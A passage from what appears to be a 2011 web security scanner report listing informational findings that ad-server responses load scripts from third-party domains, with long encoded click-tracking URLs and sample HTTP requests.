1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFVm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNVNGWlpXRkp2V0d4NWJ6RkxZM1ZvTTJ0cGJuTmlUVGRYYXpKUkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=346030314?

Request

Response

19.4. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N3727.Expedia.com/B5235969.34;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU9ghjlZF6iSwYlb.krXjG_wmefTlnZW8sdXNhLHQsMTMwNzk2NzA5MTgzNCxjLDM0ODU5MyxwYyw3ODUyNyxhYywxNzE4ODYsbyxOMC1TMCxsLDYzMDg2LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVUySFA2YW1aMmN1UURuLjFWUndwcktlUVpoaEZuWlc4c2RYTmhMSFFzTVRNd056azJOekE1TURVM05DeGpMRE0wT0RZMk15eHdZeXczT1RBeE5DeGhZeXd4TnpNME5USXNieXhPTUMxVE1DeHNMRFl6TkRZM0xIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTHpGeFRuZFFVWEpZTm5wZldHOHpRVGxEZEdaeVVIZEJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSU1d4RGJXODBhRFZRVW01ZllYbEVSMjkyUW1SNU9YWmZkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZFY21wM1ZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVhwblZVSkJaMVZEUVZGUlFVRkJRVUZ3VTFCYVpVRkJRVUZCUVM0dlkyNWtQU0ZIVVZac1MyZHBMWHBSVVZFMk5UaFhSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSlRlVzVqWWw4M01WUlpZWFZEWVZnMmJFRmxSakUzYm01RFpHWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRHMUNjMEZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0pWZWpaWFNERk1WMFV4TlVWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSM1NrZGlWbEpQVDFJNWIyaFZTMDVYYTFwVmEzWTFhQzB6TTJ0UkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=1150304106?

Request

Response

19.5. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N553.expedia.com/B5280302.8;abr=!ie;sz=728x90;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUKG9NRNq_WCC483at.0o81DY1odtnZW8sdXNhLHQsMTMwNzk2NDMyODU1MyxjLDM0MzMxNixwYyw3NjUxNyxhYywxNjgyNzcsbyxOMC1TMCxsLDYxNDA2LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVYRmNSRXpfUFlHMkl5RDRxd0FRRnlmNWs4VlZuWlc4c2RYTmhMSFFzTVRNd056azJORE15TnpFek5TeGpMRE0wTXpjeE1TeHdZeXc0TVRnMk1DeGhZeXd4TnprNU16TXNieXhPTUMxVE1DeHNMRFkyTVRNeUxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVFdKRFFWRldiM05VV1UxZllYbEVSMjkyUW1SNUxXazRYMVpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RGUldVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVRGNFFVSkJaMVZEUVZGUlFVRkJRVUZQUW5KSFVtZEJRVUZCUVM0dlkyNWtQU0UzVVZKNlMwRnBOWFZCVlZGNVMyOWlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSnRZM295YjNaUU1WUlpiVTVNU1haMGJGRm1iamMzZWpKRFpHWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFVm5RV0ZMYmt0SWVqTjBhVkEzUWtFbWJuVnRQVEVtYzJsblBVRkhhVmR4ZEhwa1VGUnNOMjVJVUU5NWVUQk1NSHB5VkMxVWIzUlJRblJGVjNjbVkyeHBaVzUwUFdOaExYQjFZaTAzTkRrME1UVTJNREkzTURFNE16UXlKbUZrZFhKc1BRby0vY2xrdXJsPQo-/clkurl=;ord=321405452?

Request

Response

19.6. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUFng8aJLBZKJyWoaUyNqjOVxerAdnZW8sdXNhLHQsMTMwNzk2NDAxMjgxMCxjLDM0NTc2OCxwYyw3NzQ4MyxhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk1LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVjdWFkUTg1dE1FcUMuTVg2ZXFWMTU3Y1F2SkpuWlc4c2RYTmhMSFFzTVRNd056azJOREF3T0RFM01TeGpMRE0wTmpRMk55eHdZeXczT1Rjd01DeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMExIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVDFRNVQxWjNVRnB3YTB4ZllYbEVSMjkyUW1SNU9XczRkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RsQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZaM2QwSkJaMVZEUVZGUlFVRkJRVUZQVW04eVlVRkJRVUZCUVM0dlkyNWtQU0ZpZDFoTVRGRnFZek5uVVZGNVQyZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmllRVpDV1Y5TU1WUmtla3BQVFhvNGJGRm1TbTFoU0hoRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNlkwTmxkMmhzU25sUGNsZzJOMGxMYVhWUVJGSlJjRFZOV1ZobkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=1314067228?

Request

Response

19.7. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N6090.218.9105273493621/B5528573.7;abr=!ie;sz=300x250;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUAdiVfk7836FQlS6cCc68tAbj5NNnZW8sdXNhLHQsMTMwNzk2NjQ3MzczNyxjLDM1MzA2MixwYyw3OTk5NSxhYywxNzUyMTIsbyxOMC1TMCxsLDY0NTE4LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVIR3Y2dlNmTmViRmZpc3lUci5wQVl5SG5UbGxuWlc4c2RYTmhMSFFzTVRNd056azJOalEzTWpRM055eGpMRE0xTXpRMU5peHdZeXc0TURRMU5peGhZeXd4TnpZd016SXNieXhPTUMxVE1DeHNMRFkwT1RNMkxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDFoSlgwTTVVMmhqWDNvNVkybzRUREZMUm5wZlVIZEJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSUzBSdWExcG9UbFZRWkdkZllYbEVSMjkyUW1SNU9FWmZVRlpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDZEZCM1dVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZEZDBJdFowRjZRekZuUVVsbk9FSkJaMVZEUVZGUlFVRkJRVUZqZVV4clkwRkJRVUZCUVM0dlkyNWtQU0V3WjFkMVRWRnFiaTFuVVZFM1pqUlpSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSXdjVTltUW1aNk1WUmlVM3BDWVhKMGJGRm1VVzlmYW5CRFpHWnhMVTVOUW13MlIxVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTJwTmQwMUlaM2xPVkVKbVdWaFFTVUZSYm1GQlUwSnZaRWhTZDA5cE9IWmtNMlF6VEc1U00xbFhUbkppUjFWMVdUSTVkRXd5YUd4WlYxSnpZVmMxYkdNMVowTnhRVjlCUVdkVVNVRnZXRk42ZDNGdlFYZEliMEUwWjBNMlFVOHhRMUJWUkVGQlFVRjNTVUZITUdKSFdtMXZjVlJxWlZKQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNWFqbGxVa2RTYkdzeVZsbElURXRqZDNOalgwRk9RekJLZFUxQkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=1686381690?

Request

Response

19.8. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N6542.218.EXPEDIA/B5416978.4;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUzXWVqsh8fE2YVH3aWZfihV.YoS9nZW8sdXNhLHQsMTMwNzk2NjE3MjcxOCxjLDM0NjQ5MyxwYyw3NzcwNixhYywxNzA1OTUsbyxOMC1TMCxsLDYyMzk5LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVaSGo3YWdmVXEzTGdORlBsejNkT1A0QS43bXhuWlc4c2RYTmhMSFFzTVRNd056azJOakUzTVRReU5TeGpMRE0wTmpVd055eHdZeXc0TURneE5TeGhZeXd4Tnpjek5UZ3NieXhPTUMxVE1DeHNMRFkxTWpZNExIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDFWeVoyVm9aWFJTTmtRNVUzVkNOa1kyTVVodlVIZEJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSUVVkWlJUTmtZMHRaYUVoZllYbEVSMjkyUW1SNVgxa3RkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZEVFdOQldVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVU1QldVSkJaMVZEUVZGUlFVRkJRVUV4VTBSRmMyZEJRVUZCUVM0dlkyNWtQU0V6UVZOdVNuZHFXR3RCVlZGcVQwVmFSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSnFjVkl5TWxCeU1WUmxNbGRDVFdwcGJGRm1aelE0VjFoRFpHWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlREUkNZMEZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFVm5RV0pHY21GcU5tdzBTREYyUkZFbWJuVnRQVEVtYzJsblBVRkhhVmR4ZEhwbk1Vc3dlWE10WkZwZmRuUnVUMEoxUW5sdlRFTlNlamhWVEZFbVkyeHBaVzUwUFdOaExYQjFZaTAzTkRrME1UVTJNREkzTURFNE16UXlKbUZrZFhKc1BRby0vY2xrdXJsPQo-/clkurl=;ord=81347700?

Request

Response

19.9. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.7;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUYdpcvZVUHMBit47.JlhAJCXBZnlnZW8sdXNhLHQsMTMwNzk2NTU1NjM3MyxjLDM0NTc2NSxwYyw3NzQ5MixhYywxNjk5NzksbyxOMC1TMCxsLDYyMjA0LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVU5V2VHQi5YbHFLVDlGS0NNQmhUVnFoRkhRME5uWlc4c2RYTmhMSFFzTVRNd056azJOVFUxTkRNNU1DeGpMRE0wTmpRMU1peHdZeXc0TURVM01peGhZeXd4TnpjNU9UZ3NieXhPTUMxVE1DeHNMRFkxTURNekxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDNKVlptaGxhRk4xTjNvdGRWSXRSalpHU3pkMlVIZEJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVFVwNU1HZDFNR1UyYUhGZllYbEVSMjkyUW1SNU9YWXRVRlpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDVFZOQldVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZoQk9FSkJaMVZEUVZGUlFVRkJRVUZpVTB0UVZXZEJRVUZCUVM0dlkyNWtQU0Z3UVZKNFNsRnBPV2QzVlZGNlNrRmFSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSkNiVTVTWW5acU1WUmlTRmRQTFY5TWMxRmxibkJpZW5SQ1RtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRHVkNPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNk5tcEdVMGt5UW5kbmJFUk1iSFp0ZEVVMWIzb3hTM3ByVWpobkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=971871834?

Request

Response

19.10. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The response dynamically includes the following script from another domain:

http://servedby.adxpose.com/adxpose/find_ad.js

Request

Response

19.11. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=;ord=1123029870? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

19.12. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=;ord=1392015523? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

19.13. http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2998.specificmedia.com/B5470646.7

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

19.14. http://ad.doubleclick.net/adi/N553.Glam/B5345813.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.Glam/B5345813.2

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

19.15. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.expedia.com/B5280302.8

Issue detail

The response dynamically includes the following scripts from other domains:

http://beacon.dmsinsights.com/beacon/1103771/2
http://cdn.doubleverify.com/script26.js?agnc=422775&cmp=5280302&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=62166116&advid=666472&sid=93127&adid=
http://edge.quantserve.com/quant.js
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

19.16. http://ad.doubleclick.net/adi/x1.dt/dt2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.dt/dt2

Issue detail

The response dynamically includes the following script from another domain:

http://load.exelator.com/load/?p=104&g=050&ssv_duid=910903057632460979

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 613
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:01:37 GMT
Expires: Mon, 13 Jun 2011 11:01:37 GMT
Discarded: true

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><img src="http://adadvisor.net/adscores/g.pixel?sid=9297587126
...[SNIP]...
<na_id>" height=1 width=1>
<script type="text/javascript" src="http://load.exelator.com/load/?p=104&g=050&ssv_duid=910903057632460979"></script>
...[SNIP]...

19.17. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
